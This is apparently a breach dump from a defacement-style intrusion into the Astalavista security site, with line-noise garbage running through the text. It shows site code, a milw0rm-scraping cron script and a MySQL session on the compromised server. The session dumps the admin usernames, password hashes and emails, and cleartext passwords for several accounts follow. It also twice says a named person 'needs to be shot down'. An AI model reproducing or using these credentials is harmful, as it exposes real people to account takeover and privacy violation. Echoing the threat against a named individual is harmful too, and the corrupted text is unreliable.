            $comExploits[$x]['lang']      = ‘2′;& j- a, Y4 i( D1 h+ X: [+ k
            $comExploits[$x]['userid']    = ‘12′;
3 p7 \* n4 L: c2 H7 H: J            $comExploits[$x]['startdate'] = ‘0000-00-00′;
& t% i& i0 g0 w. g            $comExploits[$x]['enddate']   = ‘0000-00-00′;
2 R# Y, \' S! z6 t8 i1 K9 k' l            $comExploits[$x]['status']    = ‘1′;
1 ^' Y5 [1 a9 p0 `  L            $comExploits[$x]['changelog'] = $date;/ g( R& L8 X# M- Y; D
& t: X8 ^1 n; {0 L
        }* f6 s4 b$ v" k3 k/ [! p3 v* o
[snip]
( N* Y5 R1 W$ @: W/ l- A    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>% @" I, e: g0 e/ Z$ S
<rss version=”2.0″>1 Z7 Z) @6 j" E4 h, ]' l" D# r
    <channel>
! U. i+ }4 G# A' S9 L        <title>ASTALAVISTA.com - Exploits</title>( ^! n$ d+ t$ I. L& P. l$ k
        <link>http://www.astalavista.com/exploits</link>6 q' `' ?! b5 `! E
        <description>All availably Exploits.</description>
0 y$ d! n, r  f0 W# K- s4 H        <language>en-us</language>
& l, s1 u! r: H9 a0 F4 G) t        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
6 r: d. S! ^" ~. U3 z5 L7 b: g2 b( p        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
) _) d' O! ]9 J; W9 _( l; m        <generator>Astalavista.com</generator>  t/ Z# A# E& [( _5 d: Q5 Z
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
5 n; C6 d. v9 k, k, x( d( _4 z  p    </channel>
& k+ Y$ P1 Y( `</rss>’;" S  t& c( w: K, H0 l

- T9 `5 X  i: i6 W( Q; A    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {6 e8 V8 L- z! F" i0 w
        unlink (FULLPATH . ‘/feed/exploits.xml’);4 b& F/ Y+ V* U9 [3 `+ B2 X
    }9 c# g* ~7 B9 }+ H
/ L8 U# C$ O/ ?0 y
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
. W" [1 ]. b) A+ z, Z+ R[snip]
! ]/ J( Y+ s9 [. g* V; N
8 C* c0 `; W- h7 @& A2 `) V6 |+ Osh-3.2$ cat exploits.sh
* y5 G' c2 Y1 L/ e5 s#!/bin/sh
1 {9 X" y' G# q0 P9 j7 I
! m0 T5 S- x. P6 }/ p  k1 E###########################################################  F# i, ^5 `5 T0 X' e
#                                                         #( V: B8 a. B( n# n9 ^& Z
#   Title:        milw0rm exploits adder                  #7 y& l: x% J: G- c5 Y
#   Description:  Add all milw0rm exploits to the         #% y6 c$ f8 Y0 Q+ v2 I" L6 A" T
#                 Astalavista.com database                #
8 O/ s$ M4 ^6 S3 p$ ?1 K( o1 n#                                                         #
* q6 e  N- D$ A#   Company:      Astalavista Group                       #5 Y* K; h5 s( u- w
#   Author:       Paulo M. Santos                         #
) N3 C4 s9 q2 l0 N3 s#   E-Mail:       链接标记paulo.santos@astalavista.ch             #& B  g3 E% U0 j  g+ |
#                                                         #
6 X* j4 I# O0 I: W2 j  b; ^###########################################################7 x8 ^) x' q, g7 [  ~
. h( Y% a# y- k3 s8 `. N: U8 }
# path
# T; `5 C) p/ K; X2 Fthis_path=/home/com/public_html/modifications/cronjobs( X  M, H. Y* m5 O  r! t# N) k6 I
" E  P" G# i  R
# change directory9 _# k$ T' J* l) g3 {' |1 M
cd $this_path
* m5 u1 ?& O# ]/ h3 A2 |cd tmp/5 c7 q, i# H' Q, z5 J0 T
3 w5 R. [5 i) g5 ^4 R! a
# delete files
: e3 N, c  F% E# W& Hrm -rf milw0rm.tar.* &1 X$ N( u, ?* J
rm -rf milw0rm/ &# x' }- W8 s4 A0 ^4 g% T* x

) h2 w" p, g. g8 O# a7 M# wget milw0rm paket
$ v9 f) y# q9 Uwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]6 ?& h7 v% n8 U# F

4 _4 i+ E' Z3 {, |" u# extract milw0rm paket
( J: s1 Z% _  g7 ~8 itar -xvf milw0rm.tar.bz2* \& L! `- ]% m7 B+ S- R
0 v% Q, G/ j/ F' a
# change owner
9 G2 ~" q+ {' B" xchown -R com .' p+ S: a  |0 x5 h: n% g
chgrp -R com .) }3 y+ P0 B- w9 @  N

+ c3 ]% g4 t& M$ Y& z# F# execute php script
/ k& Z/ w) S* g6 U! x8 ^8 kcd $this_path) v5 V4 q6 P0 a% h
php -q exploits.php- {# [9 ~/ Z! m- u: q

+ F7 o  V4 I1 s% h4 G: I( N# delete files
  [+ Z8 u& ]4 J* y4 [3 Drm -rf tmp/milw0rm.tar.*
! w9 }5 X' C  @7 e8 ]$ ?+ H: O! Irm -rf tmp/milw0rm/3 J8 l6 `4 k* D* K" J- S

! i3 {) U; w9 {3 U7 _& ]( ]sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
- g5 M3 s6 P' e/ zPaulo M. Santos needs to be shot down.. |+ v% `( b3 E* D0 l7 ]- U0 ]6 d
' k1 {# b5 w8 d) q' J# D% B
mysql -u contrexxuser2 -p
# }, a( v! u6 n% b* ]( w" l6 sEnter password:( c4 Z  \, P9 H$ C( \2 V, b6 O
Welcome to the MySQL monitor.  Commands end with ; or \g.
# H- \) @7 G8 v4 q. H/ @9 XYour MySQL connection id is 261694$ b  l2 I$ Y3 O6 c" r" |. d9 j
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
! N6 p9 f* _7 u5 [  z* J. G. ?
4 w1 J4 I" b& u" lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- p% Z0 g/ p! _9 G
5 d& l; ^/ y- U* amysql> show databases;8 h) U( b, ^/ T' P7 r) Z
+——————–+
; w" G9 M3 s. N| Database           |- H/ ^! f; M# P# F' t4 b
+——————–+
2 ?" T/ P5 z/ N- u3 V# S' E| information_schema |! Q5 c) |& ~# p+ h" [! a
| com_contrexx2      |2 A- W- n3 n3 W& Z
| com_contrexx2_live |
, F# ]9 Z( N0 I8 b4 e| test               |
- w/ g6 c/ x$ H) ^& ^: i+——————–+
3 D3 n+ a$ z. h9 G7 L5 L4 rows in set (0.00 sec)+ ]0 N+ ?$ h$ H3 p9 p, f
  W  U8 z9 d5 E: b
mysql> use com_contrexx2_live$ m" I5 O( X) j# g8 R5 `% k
Database changed; {% b2 l; V, s" T7 ~, O
mysql> show tables;
3 d! w5 ~6 \: v$ H/ j  j/ s' e. \/ d+————————————————–+
. e9 l2 L6 U1 A1 K' `  G| Tables_in_com_contrexx2_live                     |, ]2 s) ?. n6 }6 j9 i( L  ^+ K1 x
+————————————————–+
* r1 J, Y( g+ `; S$ t6 u. A" Z) a5 J, Z| cc_banner_counter                                |3 x/ F6 Q$ w! g) p
| cc_search_counter                                |- {/ g+ ^& m8 m2 M$ F
| contrexx_access_group_dynamic_ids                |5 @" _8 `! H! d) M+ f
| contrexx_access_group_static_ids                 |& J6 f- O( k; S+ N+ f) @. B9 o
| contrexx_access_rel_user_group                   |
* x" S2 K; a5 j. C4 D  ~- p, g| contrexx_access_settings                         |
3 I) X/ C% K- I) || contrexx_access_user_attribute                   |
( F) ^; G+ _4 R  U# || contrexx_access_user_attribute_name              |6 Q1 e: o9 _' S/ i$ v. S8 r, C
| contrexx_access_user_attribute_value             |
3 b2 \, W5 e3 f  }" h0 [| contrexx_access_user_core_attribute              |' N, D7 D% z, m; n6 h
| contrexx_access_user_groups                      |
- X8 W6 R8 e" F; k3 l| contrexx_access_user_mail                        |
1 a7 T; d$ q  ?7 Z! R- {. D8 Q0 l| contrexx_access_user_profile                     |
" I% u3 @  h- s/ Z' x| contrexx_access_user_title                       |8 T0 c5 f+ H3 i
| contrexx_access_user_validity                    |
1 v4 V# |" Y% ]| contrexx_access_users                            |
. r% ?$ U- w9 b' M) S| contrexx_backend_areas                           |4 t2 \/ M* d, c, {8 J! g; {8 J6 a% b& @" S
| contrexx_backups                                 |2 H) T3 B4 q6 R$ L+ n
| contrexx_content                                 |
: Z5 k, k+ \3 i9 X: O0 ^2 a- || contrexx_content_history                         |8 D, z7 d* u1 V. H5 w) E
| contrexx_content_logfile                         |
  a  Q; R* c: C' N4 u0 n+ N3 {7 n# L| contrexx_content_navigation                      |' v! d8 I2 l2 x  ^0 q
| contrexx_content_navigation_history              |
( e# ?3 V: b: z& W( P| contrexx_ids                                     |* O& p: J9 Q# |% e2 o4 a0 C6 J
| contrexx_languages                               |
  k, Z$ y' V/ P. p/ n| contrexx_lib_country                             |
& |$ x% o- B& H3 [$ o| contrexx_log                                     |. B# z4 W5 a  Q( s3 L1 i! @: }
| contrexx_module_alias_source                     |' h$ Q( Q9 Q  k- K2 i) N
| contrexx_module_alias_target                     |/ M& J; h9 d1 N2 `3 S; m' d
| contrexx_module_block_blocks                     |# l+ m5 t! ]( c  |
| contrexx_module_block_rel_lang                   |
% X+ I# g$ y5 ?/ N| contrexx_module_block_rel_pages                  |% ^1 R- v2 v5 {; \6 M: p
| contrexx_module_block_settings                   |: {7 F# X4 O# |2 C8 Q8 z, F
| contrexx_module_blog_categories                  |  Q" ~2 Q$ m5 M/ A0 e( Q
| contrexx_module_blog_comments                    |4 ^* K, \9 s" F/ ^
| contrexx_module_blog_message_to_category         |
; {+ x6 I  V% i8 M- g5 q; h| contrexx_module_blog_messages                    |( Q! K( v; E# s/ n
| contrexx_module_blog_messages_lang               |, q: `# K* M* \* S4 H" h' B
| contrexx_module_blog_networks                    |
) g5 r; \: X8 t/ R2 b6 X| contrexx_module_blog_networks_lang               |
% t4 T3 r; m# K2 N| contrexx_module_blog_settings                    |
3 C8 b& R5 b* D/ [4 g4 J  q0 Q| contrexx_module_blog_votes                       |7 j/ l) D  C8 e& J1 m1 x4 M- b" E
| contrexx_module_calendar                         |+ P3 U7 H1 r6 a2 t
| contrexx_module_calendar_access                  |" ?& `. x; M0 }: C, f
| contrexx_module_calendar_categories              |
  i9 `' Q1 J0 n6 J, m$ O6 s| contrexx_module_calendar_form_data               |
7 E9 X0 x: T# I4 ^| contrexx_module_calendar_form_fields             |
( E  u- [8 O+ D/ R8 C! u& q) q| contrexx_module_calendar_registrations           |" {" {. a4 d8 B( z
| contrexx_module_calendar_settings                |
0 D6 ?8 B1 Q3 V' i/ @( p| contrexx_module_calendar_style                   |; u- A9 Z* w8 m8 E5 V! T
| contrexx_module_contact_form                     |
( D# f' J/ C5 k| contrexx_module_contact_form_data                |
: I* i, B1 _" S9 g| contrexx_module_contact_form_field               |8 [& l$ Z3 ^3 c  x) N1 V
| contrexx_module_contact_settings                 |2 f% s( I/ H+ X4 L! b1 O9 V' l, u
| contrexx_module_data_categories                  |2 \7 D" l# v* q( P! b) s
| contrexx_module_data_message_to_category         |
+ I3 L# H* }) _( t| contrexx_module_data_messages                    |3 Y8 u7 L" c5 C) S
| contrexx_module_data_messages_lang               |
6 K9 R7 u. m' N0 k6 {: u" e  u| contrexx_module_data_placeholders                |
  `& O' q# }6 E) l- H4 t) v| contrexx_module_data_settings                    |
( S" j0 c! _% e9 k% N5 l% ?| contrexx_module_directory_access                 |
$ `0 n8 A7 a/ p) s# a| contrexx_module_directory_categories             |
  G! Y3 C: a  b+ y" C| contrexx_module_directory_dir                    |
9 i8 c; k: G- Z| contrexx_module_directory_inputfields            |
8 r" }0 C" X5 e9 s6 ]| contrexx_module_directory_levels                 |
: U. E" S2 r6 D- Y( g" R| contrexx_module_directory_mail                   |
  p! y8 Q3 \; g5 x7 y; Y| contrexx_module_directory_rel_dir_cat            |: }2 a7 T" F8 J$ m$ R
| contrexx_module_directory_rel_dir_level          |
( b* t9 R0 o$ F3 o6 |  a| contrexx_module_directory_settings               |
. Y$ O5 X6 ?2 t) `| contrexx_module_directory_settings_google        |
3 J! ~, ^6 B: k. f5 @( u5 M; F| contrexx_module_directory_vote                   |
; K; ~5 D  x( h9 z& n, S& G| contrexx_module_docsys                           |
( e' h" k! P, I, v, z- n| contrexx_module_docsys_categories                |
: I; \; a. w  n. A( W3 s| contrexx_module_egov_configuration               |
% }9 V; K& V& x8 |& E$ y| contrexx_module_egov_orders                      |: n7 q+ w0 O! }" ?3 }
| contrexx_module_egov_product_calendar            |( d1 ^. T$ Q0 D: V- }" e
| contrexx_module_egov_product_fields              |
% i% Y1 z# ^7 M2 H/ a2 G| contrexx_module_egov_products                    |9 L; Q  I$ J7 A, C- I/ b
| contrexx_module_egov_settings                    |) U# p0 I1 B% `& \7 `
| contrexx_module_exploits                         |, i1 z/ y( @  K# q$ ^
| contrexx_module_exploits_categories              |
% T' A' ]$ |. B+ a| contrexx_module_feed_category                    |
8 F* \% h1 F6 |* F3 _6 ~| contrexx_module_feed_news                        |
8 T0 l0 C9 ~1 O" t) @| contrexx_module_feed_newsml_association          |
6 x- C1 b' f5 M# u  `, o| contrexx_module_feed_newsml_categories           |/ ~. n% W2 F: U, b/ V5 }
| contrexx_module_feed_newsml_documents            |" D7 m: h) L6 v4 b9 L5 p
| contrexx_module_feed_newsml_providers            |
& g& X+ C/ }; q+ I' \' ~| contrexx_module_forum_access                     |2 G* |$ w$ S* e9 m, G5 l
| contrexx_module_forum_categories                 |
( ?3 s) O8 R4 {3 _1 [- U* n: `| contrexx_module_forum_categories_lang            |5 g/ S4 J/ Y" n4 n0 U7 U5 H
| contrexx_module_forum_notification               |/ T/ \0 ?' j: u+ Q
| contrexx_module_forum_postings                   |
$ q" g, M, C3 ~| contrexx_module_forum_rating                     |
; r" C. ]) I9 ]) g* D" T0 ?5 D, d8 i6 S| contrexx_module_forum_settings                   |
- S( Q* l2 o& x  w; K" d6 \| contrexx_module_forum_statistics                 |# _( V1 K! S: H& p* U
| contrexx_module_gallery_categories               |
1 ?( x7 [" E5 S/ N, `| contrexx_module_gallery_comments                 |; c: X" ], Q1 O) @9 {
| contrexx_module_gallery_language                 |( h1 U) {4 R0 `) }7 b0 v
| contrexx_module_gallery_language_pics            |5 X8 M  l1 t" R
| contrexx_module_gallery_pictures                 |) a% ?" a% x1 _2 U- E9 V6 {0 q& e4 _
| contrexx_module_gallery_settings                 |
9 |3 @, H- S$ f+ ^: J1 u2 @| contrexx_module_gallery_votes                    |
( H# e: d  i5 ~) b| contrexx_module_guestbook                        |3 M6 q$ E" z: P3 E) F5 o0 e
| contrexx_module_guestbook_settings               |; m7 e# c3 Z% l7 B9 r
| contrexx_module_livecam                          |
" @" D+ X8 A( d( Q8 j% D7 ]; L| contrexx_module_livecam_settings                 |  P9 L4 G  p7 Q+ r! K/ }7 R
| contrexx_module_market                           |' p/ O* J) \5 j7 x1 L" [7 W0 U( W
| contrexx_module_market_access                    |; @$ \5 n7 @& X0 y" x% d6 Y
| contrexx_module_market_categories                |4 }- N* m+ _' N. D. c+ H- t8 F) [. h
| contrexx_module_market_mail                      |
$ s6 Q: G/ R. p0 I$ X" @4 \7 t1 J| contrexx_module_market_paypal                    |: R7 g; X1 P/ r: Y+ s$ ?
| contrexx_module_market_settings                  |
7 p4 _; J+ V$ s7 x| contrexx_module_market_spez_fields               |
! w4 E( ~; y3 g2 K. a9 a| contrexx_module_mediadir_access                  |
5 X7 b1 a+ B- o| contrexx_module_mediadir_categories              |
/ S& \+ r# j7 u. W# M| contrexx_module_mediadir_comments                |) K" N6 S& r" u: u1 p8 z" y2 e
| contrexx_module_mediadir_dir                     |
$ D0 i8 x& H3 H6 K| contrexx_module_mediadir_inputfields             |
+ q3 A4 `2 P/ G6 M0 u- U; G| contrexx_module_mediadir_levels                  |- w8 [  O, \- s1 S- a
| contrexx_module_mediadir_mail                    |
) `5 t# z2 V) p' h$ ^* v+ W! L. C- Q| contrexx_module_mediadir_rel_dir_cat             |
3 B6 t1 v  A) S| contrexx_module_mediadir_rel_dir_level           |* b8 d0 m! O6 {' S: w0 A
| contrexx_module_mediadir_reports                 |3 A. q0 R/ ~  S; x3 s. [
| contrexx_module_mediadir_settings                |
" n" M$ D4 e+ p* j- || contrexx_module_mediadir_settings_google         |  o8 E6 }2 `  T: |; n
| contrexx_module_mediadir_vote                    |4 {" n: C  q! V, X
| contrexx_module_memberdir_directories            |' Y( P% F- ?6 J2 u" A( p. G
| contrexx_module_memberdir_name                   |
. {$ ^( F; O" Y' H3 m" I! A| contrexx_module_memberdir_settings               |
3 t; j; z$ C' V$ D7 S% A| contrexx_module_memberdir_values                 |
+ B0 N5 e3 d; F5 B8 B& Y9 H4 S| contrexx_module_nettools_allowed_groups          |% `# m, ?; [1 o
| contrexx_module_nettools_settings                |
2 z# Y4 }6 r/ S8 M9 |: Q| contrexx_module_news                             |
: W$ N) N& N( L| contrexx_module_news_access                      |
! L$ \! H/ [! t1 f& s1 ]# E| contrexx_module_news_categories                  |" R/ \9 W, r" Q5 u1 l
| contrexx_module_news_settings                    |
: O! X6 ?& J  H' k% q! d4 B* Z| contrexx_module_news_teaser_frame                |
/ ?% o0 E8 i; ~& [| contrexx_module_news_teaser_frame_templates      |
- q+ [. O% J. w  X- P5 t# c) l# F| contrexx_module_news_ticker                      |$ G, n5 f; J, q/ ^. X* J1 X
| contrexx_module_newsletter                       |" ]$ M1 ?  j& X
| contrexx_module_newsletter_attachment            |, L" O) M2 O, e
| contrexx_module_newsletter_category              |; ]5 A4 o! ]. V3 N) m  v
| contrexx_module_newsletter_confirm_mail          |
1 i3 `0 N* ]7 y& }| contrexx_module_newsletter_rel_cat_news          |
7 L- h) [- _- w- R! _" W| contrexx_module_newsletter_rel_user_cat          |* m* R. b$ t! h' x% @( M4 m. A- z  W
| contrexx_module_newsletter_settings              |8 X' x6 k( b1 V/ D. s5 H
| contrexx_module_newsletter_template              |
4 l1 ]( j. Q" ]# y4 G2 S' C+ B( j4 {| contrexx_module_newsletter_tmp_sending           |
' u# B7 K, q" I, O| contrexx_module_newsletter_user                  |
% B" S2 d( z5 _+ j& Z7 H| contrexx_module_newsletter_user_title            |. f% O" q9 N  R$ c
| contrexx_module_onlinetools_defaultports         |
# g0 t! v- O1 [+ Y0 [| contrexx_module_onlinetools_defaultports_back    |
% r  R. s0 P0 q8 G% l; A| contrexx_module_onlinetools_geolitecity_blocks   |  D9 N# L) f/ W( Q
| contrexx_module_onlinetools_geolitecity_country  |
: D) G# a# E7 t" ?: L| contrexx_module_onlinetools_geolitecity_location |" r5 {/ [% Q. o
| contrexx_module_podcast_category                 |
$ C4 ~3 f+ T+ o$ I| contrexx_module_podcast_medium                   |
# R7 w% M6 C+ b$ \| contrexx_module_podcast_rel_category_lang        |: H5 g6 Q, y$ f# J2 R( o& B
| contrexx_module_podcast_rel_medium_category      |0 `" t1 J) }' m0 s
| contrexx_module_podcast_settings                 |& ]1 i  K. s% B: T# I$ L6 X7 c0 ~4 Z
| contrexx_module_podcast_template                 |6 @8 W4 w. P$ ?- z1 i
| contrexx_module_proxydb                          |- N7 }0 |- P% w, V3 Q$ E/ `6 I6 }; d
| contrexx_module_recommend                        |
! S# l1 ^9 ]8 W5 `! k. T| contrexx_module_repository                       |$ F; a+ K( p" T/ b
| contrexx_module_securitynews_cats                |
7 o$ D1 `; r$ F( v+ c% w- U" o8 R| contrexx_module_securitynews_feeds               |
% h. S! a; \& x. `# u| contrexx_module_securitynews_news                |
% F$ g3 M! D7 v( l4 x9 `| contrexx_module_shop_categories                  |5 C. D6 q7 Y) C& {5 ?& M& y" ^5 {
| contrexx_module_shop_config                      |5 ?6 d* v5 i7 G
| contrexx_module_shop_countries                   |2 p1 n" _" S' b' V0 ~1 ~
| contrexx_module_shop_currencies                  |
2 r5 d+ |" ?$ k* v| contrexx_module_shop_customers                   |
; b8 P7 [! M7 U/ c" C| contrexx_module_shop_importimg                   |
  }9 w4 m+ \( M6 N| contrexx_module_shop_lsv                         |% J) x% M$ _3 f8 r6 q8 n! k$ m# Y
| contrexx_module_shop_mail                        |
, L7 G5 x6 @# [3 l0 ^4 x  X| contrexx_module_shop_mail_content                |
2 {7 i# o8 b' N9 D* n4 g& o9 ]: w| contrexx_module_shop_manufacturer                |7 }. X( b! {) h& h
| contrexx_module_shop_order_items                 |5 e5 \5 s& O" T; r
| contrexx_module_shop_order_items_attributes      |& U. T& b! e% ?. X9 z
| contrexx_module_shop_orders                      |
7 B8 B0 l/ V" j- O. W' _  j8 Y| contrexx_module_shop_payment                     |5 l  p$ \. y. S3 l) o+ U5 S& F) Q5 P: g
| contrexx_module_shop_payment_processors          |3 O1 L$ Q- E0 Z) S
| contrexx_module_shop_pricelists                  |& ~: Z; |6 p' [' X, @) T, Y
| contrexx_module_shop_products                    |
- w, G: ]) v1 ^| contrexx_module_shop_products_attributes         |  |) m* }% S; `" _& Q& [) W
| contrexx_module_shop_products_attributes_name    |+ J& P1 c. T' }$ r' U( [
| contrexx_module_shop_products_attributes_value   |; |, S" ?0 Y, O- H7 Q
| contrexx_module_shop_products_downloads          |1 o( W: p2 B5 U) s" u) E# K
| contrexx_module_shop_rel_countries               |8 N0 G3 k. M: X: C6 ?) O4 F
| contrexx_module_shop_rel_payment                 |
" d' d3 P6 z) C( y| contrexx_module_shop_rel_shipment                |
& D& f6 D8 i6 i0 U' A# m| contrexx_module_shop_shipment_cost               |
* T; u) d3 t! E& j" f| contrexx_module_shop_shipper                     |
" ~& X& g* I2 u| contrexx_module_shop_vat                         |6 S3 t* ~' L& k8 @) |0 b8 p6 O
| contrexx_module_shop_zones                       |
  ]# x# f, A+ {/ d( u. d7 b| contrexx_module_u2u_address_list                 |) o9 L0 Q. y$ v5 }! S
| contrexx_module_u2u_message_log                  |
3 p' q* N( \) o: F* t0 D* N| contrexx_module_u2u_sent_messages                |
1 O, ?5 b3 R) K| contrexx_module_u2u_settings                     |% Q" F) l( V- _9 q- j( K
| contrexx_module_u2u_user_log                     |8 ^) g4 B3 p: L
| contrexx_modules                                 |5 j6 E# P0 t7 a) C
| contrexx_sessions                                |' j8 e7 ?- A* ^$ [# ?* i4 t7 `
| contrexx_settings                                |
$ T* s* T: l; S$ c( {| contrexx_settings_smtp                           |  s% q$ m: F  r4 \
| contrexx_skins                                   |
  b3 a6 Y2 [/ D  `| contrexx_stats_browser                           |
/ v& Q) s" n& S; |, K) [9 g| contrexx_stats_colourdepth                       |
1 k; `' P- w% ]3 y- G1 X| contrexx_stats_config                            |
( Q8 i& W- [' I( z4 ]| contrexx_stats_country                           |
/ t0 d8 O  f" ]| contrexx_stats_hostname                          |& d& r7 U0 _$ A
| contrexx_stats_javascript                        |
, K( H+ X9 l" [| contrexx_stats_operatingsystem                   |0 C2 ]3 S8 M) ^& a
| contrexx_stats_referer                           |
: ^/ _# y7 N; R- D& B9 b/ q| contrexx_stats_requests                          |! ]! S4 v- m* |* Q/ q
| contrexx_stats_requests_summary                  |2 `8 ]) B9 F2 r; L: Y% t9 @0 G
| contrexx_stats_screenresolution                  |
5 b' O' q" ]+ a| contrexx_stats_search                            |. v; t0 H2 x1 v1 X. I
| contrexx_stats_spiders                           |& W; d5 e/ W5 r, G: p. i5 `
| contrexx_stats_spiders_summary                   |
6 _0 Y/ M; |/ X' F| contrexx_stats_visitors                          |
* n# \& J8 E$ I) R7 \| contrexx_stats_visitors_summary                  |: Y$ R$ I& `( h' }' |5 E
| contrexx_voting_additionaldata                   |
8 H( @( E" G/ x6 j/ F| contrexx_voting_email                            |
7 [) Y) D2 P" _- W5 m! T. d| contrexx_voting_rel_email_system                 |
4 s  v5 z+ T* l5 g# F' w7 V: X( ~% e! n| contrexx_voting_results                          |
' _' ~3 m, N1 z5 ~) g! s" q+ L| contrexx_voting_system                           |. ]4 ], r9 J& j$ H1 L+ d6 `! ]
| foo                                              |5 t8 V- }0 g$ T& z2 `& y
+————————————————–+
4 U) \; j2 y+ W1 C6 |1 E227 rows in set (0.01 sec)' N4 E4 P$ x1 K; S( p
" l* Y- N4 L' q% K
mysql> select count(*) as skids from contrexx_access_users;
8 M  I& ~  V. `2 q2 v; v, w  ]+——-+
) Q8 v- S* R' \7 X3 o$ l' Y| skids |
1 b' m) A" v3 F% A* t+——-+1 p- s5 F2 ]+ X6 J* i
| 53699 |- A& Q/ [( G: i7 w/ n' j
+——-+5 K) y# f  R$ M7 v4 g, K" }
1 row in set (0.00 sec)8 X# _) @: W' y- U+ }. \

) J9 `* @0 d3 U* S# smysql> describe contrexx_access_users;+ C8 H& Q1 j* v# Q3 f
+——————+——————————————+——+—–+————–+—————-+
4 I3 c* I; \! Z$ N' J+ j| Field            | Type                                     | Null | Key | Default      | Extra          |
5 V& X! a3 S8 c6 W4 d  b0 ~+——————+——————————————+——+—–+————–+—————-+: q% Z3 v' t" b* w
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |% j. @! z3 ~3 U
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |: G: T) S' e! z( Q  K
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
4 \2 E) T# u4 r+ i$ h% }| password         | varchar(32)                              | YES  |     | NULL         |                |
! G! |* w0 _0 X' p  ?1 L| regdate          | int(14) unsigned                         | NO   |     | 0            |                |0 G/ Y+ }+ s- s. U
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |* @3 ]4 o+ L- }1 \0 p) j
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
( ^4 h& B4 R9 U: V7 A3 ~) F# J| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
1 f* |' f9 x6 C4 \# ~| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
, _: Y5 e. c7 {6 X% H| email            | varchar(255)                             | YES  |     | NULL         |                |2 z% M" w; O8 K9 `, j" B
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
1 [) }% b5 d! G| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
, q% j- y2 }7 E8 g2 y| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
4 @% B$ N" z' z) B0 L6 p. C% l8 a| active           | tinyint(1)                               | NO   |     | 0            |                |
  m$ g, Z3 i+ |+ I- N( ^- ?0 ^2 a5 K| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
6 }! q3 O6 t, j; W| restore_key      | varchar(32)                              | NO   |     |              |                |
* C' r1 D: S" o! n. P: _% G$ ]| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |8 H, S+ a0 A" a
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |; T7 }" H; _9 Q$ b3 O: U- f
+——————+——————————————+——+—–+————–+—————-+
, E! A8 T% w' [4 I8 ?18 rows in set (0.00 sec)
# A- c# E; D) x/ H# u5 H" F7 W, y- Q, A+ o5 s) |
mysql> select username,password,email from contrexx_access_users where is_admin = 1;- W; l1 v, R3 r7 {* H9 }) L
+————+———————————-+—————————–+! o  B0 C# v/ \9 C' c! `
| username   | password                         | email                       |
. g" c/ V& Q; Y9 I$ F+————+———————————-+—————————–+) w6 V* V/ E  N5 W* [" c
| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
7 Y3 q/ @/ D: q/ b| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |% |% D% N1 O" R
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
- o3 n' U  _- j# o" _| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |5 s+ f1 W; ]1 u1 N3 d
+————+———————————-+—————————–+, j2 a. `# s8 |9 W) N
4 rows in set (0.04 sec)- w$ ]' X7 P) l" ]& K/ @
1 P. h+ o; A3 @
mysql> exit;) e, X# g3 ~- ~( k  f+ e- A
Bye/ }7 O7 s* U/ I

7 r# G& `4 m# B  U# r[~] There you go, your “team of security and IT professionals” is a joke., M! a" d" {& \3 W
+ |* S% ^' t8 Z
+——————————+% z4 v, w/ c* p# q0 A
system:f82BN3+_*
9 _% O9 m# Q. B/ \* a5 i! L2 [Be1er0ph0r:belerophor4astacom* q2 {  J9 W, F
prozac:asta4cms!
! s2 G* H8 @4 w2 ~/ u; `commander:mpbdaagf6m, d* v; n: g9 }- M; Q0 o8 v6 S
sykadul:ak29eral( e# ^% e& n0 e( `
+——————————+
; u0 d! a' `+ h5 C6 L0 h/ _  D. F9 ]% N
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  B7 j6 q) H( H& p' }…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.# x6 @2 r3 v1 ?1 a

8 L' @4 u1 H( F4 X1 e( v' }[~] Lets move to astalavista.net now,8 {* L; W2 S1 j, z) e& i1 s! O9 {
# j( x# I3 Q% k3 M. L5 u$ T) Q
From <链接标记[url]https://www.astalavista.net/[/url]>:* g3 a  R* p! Z* A7 ?- U4 f" |
>> Everyone knows that the best defense is a good offense.
' q" l) ]" `6 A5 j/ k2 t>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
$ n5 Q6 N8 _# W4 n  [& \4 O>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
- V$ N. a) d8 y9 F5 [2 D7 V>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
  q1 G" ^' Z  Y
* D8 W: v3 H9 k! P7 v2 @>> Go ahead, try and hack our server . in a completely legal way!2 x6 A5 @, L6 m" H+ g
>> Learn by doing: We offer our members tricky tasks and challenges on an8 Z2 R5 h9 P, \
>> ongoing basis so you can test your knowledge and abilities. You can also" @0 Y- m# O: {8 {8 }' p
>> demonstrate what you.ve mastered by taking part in regular hacker contests
9 z  X  {% p) I: s>> and war games
. w, t0 o0 m8 C
3 y; ^$ K- W* U, d0 r+ L! R! o7 j7 S[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
